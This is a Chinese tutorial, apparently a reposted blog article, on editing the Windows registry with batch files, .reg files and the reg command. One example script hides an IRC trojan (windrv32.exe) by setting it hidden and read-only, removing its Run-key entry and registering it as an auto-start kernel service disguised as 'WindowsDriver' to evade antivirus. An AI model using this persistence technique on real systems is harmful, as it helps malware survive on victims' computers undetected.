中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

批處理如何操作注冊表

發布時間:2021-10-08 11:20:04 來源:億速云 閱讀:217 作者:小新 欄目:開發技術

這篇文章將為大家詳細講解有關批處理如何操作注冊表,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。

一,批處理生成.Reg文件操作注冊表
  用批處理中的重定向符號可以輕松地生成.reg文件。然后用命令執行.reg文件即可!
  這里,著重要了解.reg文件操作注冊表的方法。
  首先.reg文件首行必須是:Windows Registry Editor Version 5.00。然后才是操作注冊表的內容。
  (就和從注冊表中導出的文件格式一致)

  1,創建子項
  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]

  在HKEY_LOCAL_MACHINE\SOFTWARE\下創建了一個名字為“TTT”的子項。

  2,創建一個項目名稱

代碼如下:


  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
  "Name"="TTT BLOG"
  "EMail"="taoether@gmail.com"
  "URL"="http://www.taoyoyo.net/ttt/"
  "Type"=dword:02


  這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]下新建了:Name、EMail、 URL、Type這四個項目
  Name、Email、URL的類型是“String Value”
  Type的類型是“DWORD Value”

  (附:windows注冊表值類型:
  REG_SZ 字符串值
  REG_BINARY 二進制值
  REG_DWORD DWORD值
  REG_MULTI_SZ 多字符串值
  REG_EXPAND_SZ 可擴充字符串值)

  3,修改鍵值
  修改相對來說比較簡單,只要把你需要修改的項目導出,然后用記事本進行修改,然后導入(regedit /s)即可。就象新建一樣即可。可以一次修改同一子項下的多個項目。

  4,刪除項目名稱

代碼如下:


  Windows Registry Editor Version 5.00
  [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
  "EMail"=-


  執行該腳本,"EMail"就被刪除了;

  5,刪除子項

代碼如下:


  Windows Registry Editor Version 5.00
  [-HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
  [-HKEY_LOCAL_MACHINE\SOFTWARE\DDD]


  執行該腳本,子項ttt和ddd就已經被刪除了。

  6,.reg文件執行方法
  1)直接執行reg文件
  2)regedit /s *.reg (/s不用確認)
  3)reg import *.reg

  7,其實,我們也可以用dll文件代替reg文件。

  批處理例1:

代碼如下:


  @echo off
  echo Windows Registry Editor Version 5.00 >t1.reg
  echo.
  echo [HKEY_LOCAL_MACHINE\SOFTWARE\TTT] >>t1.reg
  echo "Name"="TTT BLOG" >>t1.reg
  echo "EMail"="taoether@gmail.com" >>t1.reg
  echo "URL"="http://www.taoyoyo.net/ttt/" >>t1.reg
  echo "Type"=dword:02 >>t1.reg
  regedit /s t1.reg
  del /q t1.reg
  pause


  批處理2:(這個例子是別人的,不是很懂的說~~)
  我們現在在使用一些比較老的木馬時,可能會在注冊表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一個鍵值用來實現木馬的自啟 動.但是這樣很容易暴露木馬程序的路徑,從而導致木馬被查殺,相對地若是將木馬程序注冊為系統服務則相對安全一些.下面以配置好地IRC木馬DSNX為例 (名為windrv32.exe)

代碼如下:


  @start windrv32.exe
  @attrib +h +r windrv32.exe
  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
  @echo "windsnx "=- >>patch.dll
  @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
  @regedit /s patch.dll
  @delete patch.dll
  @REM [刪除DSNXDE在注冊表中的啟動項,用sc.exe將之注冊為系統關鍵性服務的同時將其屬性設為隱藏和只讀,并config為自啟動]
  @REM 這樣不是更安全^_^.



  二,reg命令操作注冊表

  Reg命令是Windows提供的一下專門操作注冊表的工具。可以方便的查詢,添加,刪除,導入,導出,比較等操作。具體可以參考系統自帶的幫助……

REG Operation [參數列表]
Operation [ QUERY | ADD | DELETE | COPY |
SAVE | LOAD | UNLOAD | RESTORE |
COMPARE | EXPORT | IMPORT ]

  1,查詢所有子項和值
  
D:\>reg query hklm\software\TTT

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\TTT
Name REG_SZ TTT BLOG
EMail REG_SZ taoether@gmail.com
URL REG_SZ http://www.taoyoyo.net/ttt/
Type REG_DWORD 0x2

  2,查詢特定項

D:\>reg query hklm\software\ttt /v url

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\software\ttt
url REG_SZ http://www.taoyoyo.net/ttt/

  這里最難的是如何取得我們想要的字符串呢,困惑了好長時間,終于找到方法了。
  原來也沒有別的好辦法,只能用find,for循環來截取我們需要的內容。(下面的例子如果看不懂,請參考本博客另外的文章:DOS循環-bat/批處理for命令詳解之二)
  例如我們要得到url的鍵值: http://www.taoyoyo.net/ttt/,可以用以下腳本:

代碼如下:


  @ECHO OFF
  for /f "tokens=1,2,3,4,*" %%i in ('reg query "HKEY_LOCAL_MACHINE\software\ttt" ^| find /i "URL"') do SET "pURL=%%k"
  echo TTT BLOG的URL值為:%pURL%


  保存為Test.bat,運行結果如下:

D:\>test.bat
TTT BLOG的URL值為:http://www.taoyoyo.net/ttt/

  不行了,家里的電腦不知為啥,在命令行中一運行“REG”命令(包括reg /?),CPU就占用100%,看任務管理器,CMD占用百分之八十多,不知道為啥……
  運行其他的命令就沒有問題,包括regedit /s……

  查了一下,網上有說是中了木馬的原因,但查了一下,也不象。既沒有找到相關文件,而且運行其它的命令時,沒有問題……
  先不搞了,正好手頭有個REG命令詳解,等會整理一下!

  因為查毒,用自己做的Clear.bat清理了一下C盤,居然清理出1個G的空間來,原來只剩幾百兆了……windows的垃圾真是多啊~~不要忘了經常清理一下啊!

  再發布兩個做好的批處理文件,可以自動監控OutLook Express,有需要的可以點擊下載……
  1,OEMonitorCount.bat 功能:可以重設注冊表中OE打開次數,避免超過100次時提示壓縮
  2,OEMonitorSize.bat 功能:可以監控Outlook Express郵件文件(*.dbx)大小,當大于指定大小時,生成報警日志。

  這兩個文件,可以加到啟動組里,每次開機自動運行!
  搞這兩個主要是為了解決公司經常出現的一些問題:
  1)經常有人的郵件文件超過幾個G;
  2)有時而且根據提示壓縮后,可能出現郵件丟失。

  剛發現,下載后的文件又加了“htm"的后綴,請去掉此后綴再使用!
  另外下載時,請使用下面的鏈接,如:千腦電信高速下載地址、千腦網通高速下載地址。上面的VIP鏈接是專供千腦用戶使用的~~

關于“批處理如何操作注冊表”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

富顺县| 旬邑县| 武冈市| 博客| 双桥区| 广元市| 建宁县| 陇西县| 龙口市| 静海县| 洪湖市| 福海县| 鄱阳县| 通渭县| 绥宁县| 鲁山县| 阿克苏市| 桃园市| 宁陵县| 韩城市| 临泽县| 毕节市| 阿克苏市| 调兵山市| 高青县| 左云县| 东乡族自治县| 碌曲县| 荥经县| 保靖县| 玉山县| 芮城县| 岑巩县| 建宁县| 图木舒克市| 乌鲁木齐县| 江口县| 都昌县| 福贡县| 洮南市| 班戈县|